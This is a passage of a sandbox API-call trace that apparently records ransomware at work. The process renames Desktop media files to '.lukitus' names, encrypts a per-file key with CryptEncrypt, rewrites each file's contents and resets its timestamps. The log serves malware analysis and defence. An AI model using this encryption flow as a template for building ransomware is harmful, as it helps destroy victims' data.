CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.884] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0108.884] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0108.885] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Desktop\\W-MpCtMmi.wav" (normalized: "c:\\users\\aetadzjz\\desktop\\w-mpctmmi.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0108.885] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Desktop\\W-MpCtMmi.wav" (normalized: "c:\\users\\aetadzjz\\desktop\\w-mpctmmi.wav"), lpNewFileName="c:\\Users\\aETAdzjz\\Desktop\\F56924BE-9663-41BB-55B2160B-4B57C0D92397.lukitus" (normalized: "c:\\users\\aetadzjz\\desktop\\f56924be-9663-41bb-55b2160b-4b57c0d92397.lukitus"), dwFlags=0x9) returned 1 [0108.887] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0108.887] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0108.892] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x64bb, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x64bb, lpOverlapped=0x0) returned 1 [0108.892] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0108.892] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x64bb, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x64bb, lpOverlapped=0x0) returned 1 [0108.892] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0108.893] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x64edaed0, dwHighDateTime=0x1d31760)) [0108.893] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0108.893] FlushFileBuffers (hFile=0x328) returned 1 [0108.896] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Desktop\\yv8TpvMdu0.mp3" (normalized: "c:\\users\\aetadzjz\\desktop\\yv8tpvmdu0.mp3"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a24d800, ftCreationTime.dwHighDateTime=0x1d2f7b2, ftLastAccessTime.dwLowDateTime=0xacc959d0, ftLastAccessTime.dwHighDateTime=0x1d30409, ftLastWriteTime.dwLowDateTime=0xacc959d0, ftLastWriteTime.dwHighDateTime=0x1d30409, nFileSizeHigh=0x0, nFileSizeLow=0x14c6a)) returned 1 [0108.896] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.896] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.896] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.896] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.896] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.896] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.896] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.896] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.896] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.896] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.896] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.896] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.896] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.896] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.896] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.896] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.896] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.896] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.896] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.896] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.896] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0108.896] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0108.896] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Desktop\\yv8TpvMdu0.mp3" (normalized: "c:\\users\\aetadzjz\\desktop\\yv8tpvmdu0.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0108.896] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Desktop\\yv8TpvMdu0.mp3" (normalized: "c:\\users\\aetadzjz\\desktop\\yv8tpvmdu0.mp3"), lpNewFileName="c:\\Users\\aETAdzjz\\Desktop\\F56924BE-9663-41BB-3FCF7E2A-E81A367BF706.lukitus" (normalized: "c:\\users\\aetadzjz\\desktop\\f56924be-9663-41bb-3fcf7e2a-e81a367bf706.lukitus"), dwFlags=0x9) returned 1 [0108.898] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0108.898] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0108.903] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x14c6a, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x14c6a, lpOverlapped=0x0) returned 1 [0108.903] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0108.903] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x14c6a, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x14c6a, lpOverlapped=0x0) returned 1 [0108.904] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0108.904] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x64f01030, dwHighDateTime=0x1d31760)) [0108.904] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0108.904] FlushFileBuffers (hFile=0x328) returned 1 [0108.907] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Desktop\\zZG5e5YF\\4csml7.mp3" (normalized: "c:\\users\\aetadzjz\\desktop\\zzg5e5yf\\4csml7.mp3"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x343c17e0, ftCreationTime.dwHighDateTime=0x1d2fd20, ftLastAccessTime.dwLowDateTime=0xf5d7e4e0, ftLastAccessTime.dwHighDateTime=0x1d302d6, ftLastWriteTime.dwLowDateTime=0xf5d7e4e0, ftLastWriteTime.dwHighDateTime=0x1d302d6, nFileSizeHigh=0x0, nFileSizeLow=0x9c9)) returned 1 [0108.907] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.907] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.907] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.907] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.907] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.907] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.907] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.907] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.907] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.907] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.907] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.907] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.907] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.907] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.907] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.907] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.907] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.907] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.907] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.907] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.907] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0108.907] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0108.907] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Desktop\\zZG5e5YF\\4csml7.mp3" (normalized: "c:\\users\\aetadzjz\\desktop\\zzg5e5yf\\4csml7.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0108.908] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Desktop\\zZG5e5YF\\4csml7.mp3" (normalized: "c:\\users\\aetadzjz\\desktop\\zzg5e5yf\\4csml7.mp3"), lpNewFileName="c:\\Users\\aETAdzjz\\Desktop\\zZG5e5YF\\F56924BE-9663-41BB-51FECB82-FFCD7A7B4612.lukitus" (normalized: "c:\\users\\aetadzjz\\desktop\\zzg5e5yf\\f56924be-9663-41bb-51fecb82-ffcd7a7b4612.lukitus"), dwFlags=0x9) returned 1 [0108.909] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0108.909] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0108.914] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x9c9, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x9c9, lpOverlapped=0x0) returned 1 [0108.914] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0108.914] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x9c9, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x9c9, lpOverlapped=0x0) returned 1 [0108.915] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0108.915] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x64f01030, dwHighDateTime=0x1d31760)) [0108.915] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0108.915] FlushFileBuffers (hFile=0x328) returned 1 [0108.919] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Desktop\\zZG5e5YF\\aLldt37So 5xCJ\\Da3Cs8ioIcfSOE.swf" (normalized: "c:\\users\\aetadzjz\\desktop\\zzg5e5yf\\alldt37so 5xcj\\da3cs8ioicfsoe.swf"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x87e8070, ftCreationTime.dwHighDateTime=0x1d2f5f0, ftLastAccessTime.dwLowDateTime=0xbb6deb10, ftLastAccessTime.dwHighDateTime=0x1d2ffa7, ftLastWriteTime.dwLowDateTime=0xbb6deb10, ftLastWriteTime.dwHighDateTime=0x1d2ffa7, nFileSizeHigh=0x0, nFileSizeLow=0x6a88)) returned 1 [0108.919] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.919] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.919] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.919] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.919] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.919] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.919] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.919] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.919] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.919] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.919] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.919] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.919] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.919] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.919] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.919] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.919] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.919] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.919] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.919] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.919] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0108.919] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0108.919] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Desktop\\zZG5e5YF\\aLldt37So 5xCJ\\Da3Cs8ioIcfSOE.swf" (normalized: "c:\\users\\aetadzjz\\desktop\\zzg5e5yf\\alldt37so 5xcj\\da3cs8ioicfsoe.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0108.919] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Desktop\\zZG5e5YF\\aLldt37So 5xCJ\\Da3Cs8ioIcfSOE.swf" (normalized: "c:\\users\\aetadzjz\\desktop\\zzg5e5yf\\alldt37so 5xcj\\da3cs8ioicfsoe.swf"), lpNewFileName="c:\\Users\\aETAdzjz\\Desktop\\zZG5e5YF\\aLldt37So 5xCJ\\F56924BE-9663-41BB-B1710BE7-DD08C11B7FEF.lukitus" (normalized: "c:\\users\\aetadzjz\\desktop\\zzg5e5yf\\alldt37so 5xcj\\f56924be-9663-41bb-b1710be7-dd08c11b7fef.lukitus"), dwFlags=0x9) returned 1 [0108.921] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0108.921] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0108.926] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x6a88, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x6a88, lpOverlapped=0x0) returned 1 [0108.926] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0108.926] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x6a88, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x6a88, lpOverlapped=0x0) returned 1 [0108.927] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0108.927] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x64f27190, dwHighDateTime=0x1d31760)) [0108.927] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0108.927] FlushFileBuffers (hFile=0x328) returned 1 [0108.930] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Desktop\\zZG5e5YF\\dMOD_L2_N\\59JR3lNu.m4a" (normalized: "c:\\users\\aetadzjz\\desktop\\zzg5e5yf\\dmod_l2_n\\59jr3lnu.m4a"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9ac3670, ftCreationTime.dwHighDateTime=0x1d30550, ftLastAccessTime.dwLowDateTime=0x6af407e0, ftLastAccessTime.dwHighDateTime=0x1d2fcba, ftLastWriteTime.dwLowDateTime=0x6af407e0, ftLastWriteTime.dwHighDateTime=0x1d2fcba, nFileSizeHigh=0x0, nFileSizeLow=0x107e2)) returned 1 [0108.930] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.930] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.930] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.930] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.930] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.930] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.930] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.930] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.930] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.930] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.930] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.930] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.930] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.930] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.930] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.930] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.930] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.930] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.930] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.930] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.930] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0108.930] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0108.930] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Desktop\\zZG5e5YF\\dMOD_L2_N\\59JR3lNu.m4a" (normalized: "c:\\users\\aetadzjz\\desktop\\zzg5e5yf\\dmod_l2_n\\59jr3lnu.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0108.930] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Desktop\\zZG5e5YF\\dMOD_L2_N\\59JR3lNu.m4a" (normalized: "c:\\users\\aetadzjz\\desktop\\zzg5e5yf\\dmod_l2_n\\59jr3lnu.m4a"), lpNewFileName="c:\\Users\\aETAdzjz\\Desktop\\zZG5e5YF\\dMOD_L2_N\\F56924BE-9663-41BB-0BE52A62-0D79B43742F3.lukitus" (normalized: "c:\\users\\aetadzjz\\desktop\\zzg5e5yf\\dmod_l2_n\\f56924be-9663-41bb-0be52a62-0d79b43742f3.lukitus"), dwFlags=0x9) returned 1 [0108.932] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0108.932] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0108.937] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x107e2, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x107e2, 